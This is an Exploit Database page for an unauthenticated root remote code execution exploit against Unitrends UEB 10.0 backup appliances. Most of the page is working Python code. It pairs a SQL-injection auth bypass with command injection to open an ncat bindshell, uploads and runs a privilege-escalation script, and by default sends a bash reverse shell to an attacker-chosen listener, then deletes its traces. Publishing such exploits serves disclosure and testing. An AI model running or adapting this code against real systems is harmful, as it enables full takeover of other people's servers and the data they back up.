Unitrends UEB 10.0 – Root Remote Code Execution

• Exploit Database
• 115 阅读

• 作者： Jared Arave
  日期： 2018-03-16
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/44297/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259

  # Exploit Title: Unauthenticated root RCE for Unitrends UEB 10.0 # Date: 10/17/2017 # Exploit Authors: Cale Smith, Benny Husted, Jared Arave # Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413 # Vendor Homepage: https://www.unitrends.com/ # Software Link: https://www.unitrends.com/download/enterprise-backup-software # Version: 10.0.0 # Tested on: 10.0.0-2.201706252204.CentOS6, 10.0.0-5.201708151911.CentOS6 # CVE: CVE-2018-6328, CVE-2018-6329   import httplib import urllib import ssl import random import sys import base64 import string import socket from optparse import OptionParser   # Print some helpful words: print """ ############################################################################### Unauthenticated root RCE for Unitrends Backup Tested against appliance versions: [+] 10.0.0-2.201706252204.CentOS6 [+] 10.0.0-5.201708151911.CentOS6   The Deal:   1. A sqli + low priv remote RCE vulnerability to is used to establish a low priv remote shell from the UEB 10 host (you don&apos;t need to worry about setting up a listener). 2. A local privesc exploit containing the desired command is uploaded to the host using this shell, and executed. 3. The initial low priv shell is closed, and the local privesc script is deleted.   To use the exploit as written, make sure you&apos;re running a reverse shell listener somewhere, using a command like:   $ nc -nlvp 4444   Then, just specify the ip and port of the remote listener in the exploit command. Alternatively, modify this exploit to contain a command of your choosing by modifying the &apos;cmd&apos; argument. ############################################################################### """   # Disable SSL Cert validation if hasattr(ssl, &apos;_create_unverified_context&apos;): ssl._create_default_https_context = ssl._create_unverified_context   # Parse command line args: usage = "Usage: %prog -r <appliance_ip> -l <listener_ip> -p <listener_port>\n"\ " %prog -r <appliance_ip> -c &apos;touch /tmp/foooooooooooo&apos;"   parser = OptionParser(usage=usage) parser.add_option("-r", &apos;--RHOST&apos;, dest=&apos;rhost&apos;, action="store", help="Target host w/ UNITRENDS UEB installation") parser.add_option("-l", &apos;--LHOST&apos;, dest=&apos;lhost&apos;, action="store", help="Host listening for reverse shell connection") parser.add_option("-p", &apos;--LPORT&apos;, dest=&apos;lport&apos;, action="store", help="Port on which nc is listening") parser.add_option("-c", &apos;--cmd&apos;, dest=&apos;cmd&apos;, action="store", help="Run a custom command, no reverse shell for you.")   (options, args) = parser.parse_args()   if options.cmd: if (options.lhost or options.lport): parser.error("[!] Options --cmd and [--LHOST||--LPORT] are mututally exclusive.\n")   elif not options.rhost: parser.error("[!] No remote host specified.\n")   elif options.rhost is None or options.lhost is None or options.lport is None: parser.print_help() sys.exit(1)   RHOST = options.rhost LHOST = options.lhost LPORT = options.lport if options.cmd: cmd = options.cmd else: cmd = &apos;bash -i >& /dev/tcp/{0}/{1} 0>&1 &&apos;.format(LHOST, LPORT)   apache_ncat_port = random.randint(4000,5000)   ############################################################################### # STAGE 1: LOW PRIVE RCE! # Bypass authentication and run a command as apache. In this case, # we&apos;ll run a netcat bindshell on a random port... # ncat -lvp 4444 -e /bin/sh # NB: This is not the part of the process where we&apos;re going to run our command. # We&apos;re establishing a reverse shell which will be used later to state a # privilege escalation payload onto this box. ###############################################################################   low_priv_cmd = "ncat -lvp {0} -e /bin/sh &".format(str(apache_ncat_port)) url = &apos;/api/hosts/&apos;   # Here, a SQLi string overrides the uuid, providing auth bypass. # We&apos;ll need to base64 encode before sending... auth = base64.b64encode("v0:b&apos; UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0")   params = urllib.urlencode({&apos;auth&apos; : auth})   params = """{{"name":"bbb","ip":"10.0.0.200&apos;\\"<code>0&{0}</code>&apos;"}}""".format(low_priv_cmd)   headers = {&apos;Host&apos; : RHOST, &apos;Content-Type&apos; : &apos;application/json&apos;, &apos;X-Requested-With&apos; : &apos;XMLHttpRequest&apos;, &apos;AuthToken&apos; : auth }   # Establish an HTTPS connection and send the payload. conn = httplib.HTTPSConnection(RHOST, 443) conn.set_debuglevel(0)   print "[+] Sending payload to remote host [https://{0}]".format(RHOST) print "[+] opening low-priv bindshell w/ the following command:" print "[+] {0}".format(low_priv_cmd)   conn.request("POST", url, params, headers=headers) r1 = conn.getresponse()   r1.close()   ############################################################################### # STAGE 2: MOVE THE PRIVESC ONTO THE REMOTE BOX! # The local root RCE exploit below will be printf&apos;d into a file in /tmp # NB: your command of choice has been inserted into this exploit. ###############################################################################   priv_esc_text = """   import socket import binascii import struct import time import sys from optparse import OptionParser   # Parse command line args: usage = "Usage: %prog -c &apos;touch /tmp/foooooooooooo&apos;"   parser = OptionParser(usage=usage) parser.add_option("-c", &apos;--cmd&apos;, dest=&apos;cmd&apos;, action="store", help="Run a custom command, no reverse shell for you.") parser.add_option("-x", &apos;--xinetd&apos;, dest=&apos;xinetd&apos;, action="store", type="int", default=1743, help="port on which xinetd is running (default: 1743)")   (options, args) = parser.parse_args()   RHOST = &apos;127.0.0.1&apos; XINETDPORT = options.xinetd cmd = options.cmd   def recv_timeout(the_socket,timeout=2): the_socket.setblocking(0) total_data=[];data=&apos;&apos;;begin=time.time() while 1: #if you got some data, then break after wait sec if total_data and time.time()-begin>timeout: break #if you got no data at all, wait a little longer elif time.time()-begin>timeout*2: break try: data=the_socket.recv(8192) if data: total_data.append(data) begin=time.time() else: time.sleep(0.1) except: pass return &apos;&apos;.join(total_data)   print "[+] attempting to connect to xinetd on {0}:{1}".format(RHOST, str(XINETDPORT))   try: s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s1.connect((RHOST,XINETDPORT)) except: print "[!] Failed to connect!" exit()   data = s1.recv(4096) bpd_port = int(data[-8:-3])   try: pass s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s2.connect((RHOST, bpd_port)) except: print "[!] Failed to connect!" s1.close() exit()   print "[+] Connected! Sending the following cmd to {0}:{1}".format(RHOST,str(XINETDPORT)) print "[+] &apos;{0}&apos;".format(cmd)   cmd_len = chr(len(cmd) + 3) packet_len = chr(len(cmd) + 23)   packet = &apos;\\xa5\\x52\\x00\\x2d&apos; packet += &apos;\\x00&apos; * 3 packet += packet_len packet += &apos;\\x00&apos; * 3 packet += &apos;\\x01&apos; packet += &apos;\\x00&apos; * 3 packet += &apos;\\x4c&apos; packet += &apos;\\x00&apos; * 3 packet += cmd_len packet += cmd packet += &apos;\\x00&apos; * 3   s1.send(packet)   data = recv_timeout(s2)   print data   s1.close() #s2.close()   """   s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) pe_filename = &apos;&apos;.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(16)) pe_filename += ".py"   print "[+] Connecting to ncat bindshell at {0}:{1}.".format(RHOST, str(apache_ncat_port)) try: s2.connect((RHOST,apache_ncat_port)) except Exception as e: print "[!] something&apos;s wrong with %s:%d. Exception is %s" % (address, port, e) exit()   print "[+] Transfering privesc script to remote host..." for line in priv_esc_text.split(&apos;\n&apos;): line = base64.b64encode(line+&apos;\n&apos;) ft_cmd = "echo " + line + " | base64 -d >> /tmp/{0}\n".format(pe_filename)   s2.send(ft_cmd)   print "[+] Executing command:" print "[+] &apos;{0}&apos;".format(cmd) high_priv_cmd = "python /tmp/{0} -c &apos;{1}&apos;\n".format(pe_filename, cmd) s2.send(high_priv_cmd) print "[+] Cleaning up, removing remote privesc script." cleanup_cmd = "rm /tmp/{0}\n".format(pe_filename) s2.send(cleanup_cmd)   print "[+] We did it! :D" s2.close()